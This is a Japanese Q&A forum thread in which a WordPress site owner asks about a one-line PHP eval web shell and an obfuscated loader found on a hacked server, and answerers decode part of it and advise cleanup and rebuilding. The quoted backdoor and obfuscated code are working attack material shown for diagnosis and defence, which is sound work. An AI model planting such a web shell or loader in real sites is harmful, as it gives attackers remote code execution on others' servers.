PHPの中にあったO（オー）と0（ゼロ）で作られた文字が読めません＆evalについて

Question

PHP初心者なので、基本的な質問でしたら申し訳ありません。

先日よりサイトの調子が悪く現在リニューアル状態にした者です。

PHPはほとんど触ったことないので、以下のものについて「どういったものなのか」や「どう対処すればよいか」などのアドバイスをいただければと思います。

- 4v0hlv20.phpという名前のファイル。この中に以下のものが書かれていました。
```ここに言語を入力
<?php @eval($_POST['j6lvn882']);?>
```
[参考サイト](http://tanakahisateru.hatenablog.jp/entry/20081017/1224212149)こちらのサイトを見ると、もしかしてバックドアを通されているのかな？と気になっています。



- wp-blog-header.phpというファイルの頭部分にやたらと長い（しかもまったく読めない）codeが大量にあって、これがデフォルトなのか改ざんされたのか、元のファイルを管理していない私には判断つかないので、どういったモノなのかさえ分かれば教えていただきたいです。一部掲載します。
```ここに言語を入力
$O_O0OO_00_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O0OOO__00_=$O_O0OO_00_{26}.$O_O0OO_00_{6}.$O_O0OO_00_{10}.$O_O0OO_00_{30}.$O_O0OO_00_{29}.$O_O0OO_00_{26}.$O_O0OO_00_{30}.$O_O0OO_00_{38}.$O_O0OO_00_{6}.$O_O0OO_00_{18}.$O_O0OO_00_{23}.$O_O0OO_00_{10}.$O_O0OO_00_{29}.$O_O0OO_00_{10}.$O_O0OO_00_{12}.$O_O0OO_00_{5}.$O_O0OO_00_{30}.$O_O0OO_00_{2}.$O_O0OO_00_{35}.$O_O0OO_00_{0}.$O_O0OO_00_{30}.$O_O0OO_00_{29}.$O_O0OO_00_{33}.$O_O0OO_00_{30}.$O_O0OO_00_{10};$O_00OO0_O_=$O_O0OO_00_{16}。。。
```

こんなのが何十行と続いており、最後の方の間にちょこちょことHTMLっぽいコードが間に埋められていました。
この下にWP公式っぽいものが数行書かれています。

かなり分かりにく質問の仕方になってしまっているかと思いますが、何卒よろしくお願いいたします。。

Accepted Answer

皆様のアドバイスを参考にさせていただいて、仕込まれていたファイルを発見、削除、ユーザ権限の確認と刷新をいたしまいたところ無事に復旧いたしました。

またkei344様からのアドバイスにありました用Webからのアクセスを全面的にできないようにしたところ不審なIPアドレスがなくなりました。
大変参考になりました。

ご協力・ご回答いただいた皆様、本当にありがとうございました。

Answer

提示の難読化されているコードが展開されると
`$O_O0OO_00_` は `n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j`になり、
それの組み合わせで生成される文字列 `$O0OOO__00_`は `date_default_timezone_set`となっています。
つまり、phpコードを生成しており、それで`<?php @eval($_POST['j6lvn882']);?>`を埋め込んでいったんだと思います。Webサーバーの実行権限でなんでも実行できる状態です。

Webサーバーの実行権限・サーバーの脆弱性対策状態にもよりますが、Webアクセス以外の通信も気を付けた方が良いでしょう。
サーバーに対してどれくらいコントロールする権限を持っているかわかりませんが、アクセスログなども（改ざんされている可能性がないではないですが、）収集しておき、ssh接続できるなら、lastやlastbで不明なIPからアクセスが無いかも確認してください。

一部を修正してリカバリーするのは危険ですので、再構築を軸に考えてください。

Answer

```PHP
<?php @eval($_POST['j6lvn882']);?>
```

このコードが公開領域にあったのだとすれば、PHPで可能なことはほとんど全て出来る可能性が高いです。これが書かれているファイルというかサーバへのアクセスは停止されていますか？されていない場合書き換えは続きます。

Answer

WordPressがインストールされているサーバーであれば必ず読み込まれるであろうphpファイル名として、何らかのいたずらや悪意あるコードがアップロードされているものだと思います。

内容については全文掲載されていないので解読できませんが、どこかにevalだとか、デコードして文字列を組み替えたものを実行してしまう内容になっているんじゃないでしょうか。
例示されている箇所についてだけ言及すると、何らかの悪意あるコードを展開させるために、アルファベットや記号や数字を含んだ文字列を、指定の位置の文字を一文字ずつ抜き出して改めて連結しようとしていますね。
機械的に展開すれば、26文字目、6文字目、10文字目、、、と連結して生成される文字列が直接実行されるのか、あるいはさらにまた組み替えられてしまうのか、ですね。

サーバーレンタルしなおして最初から構築しなおしたほうが手間がかからないかもしれません。

あまりオススメできませんが現行サーバーを使い続けるとしたら、
最初に、webサーバープロセスを停止させます。
実行していると点検中に随時介入される恐れが出てきますので。

次に、webサーバーのphpファイルなどが置かれているディレクトリをgrepしてevalなど変数に入っている文字列を直接実行しそうな箇所がないかを点検します。
_POSTや_GETや_REQUESTも点検すると良いでしょう。

自作コンテンツをいじってしのばせるというよりも、
予め作りこんだものを置きに行っている気がするので、
知らないコンテンツを削除するだけでいいのかもしれません。

パスワード生成ツールなどを駆使して難しいパスワードにするのも忘れずに。

関連した質問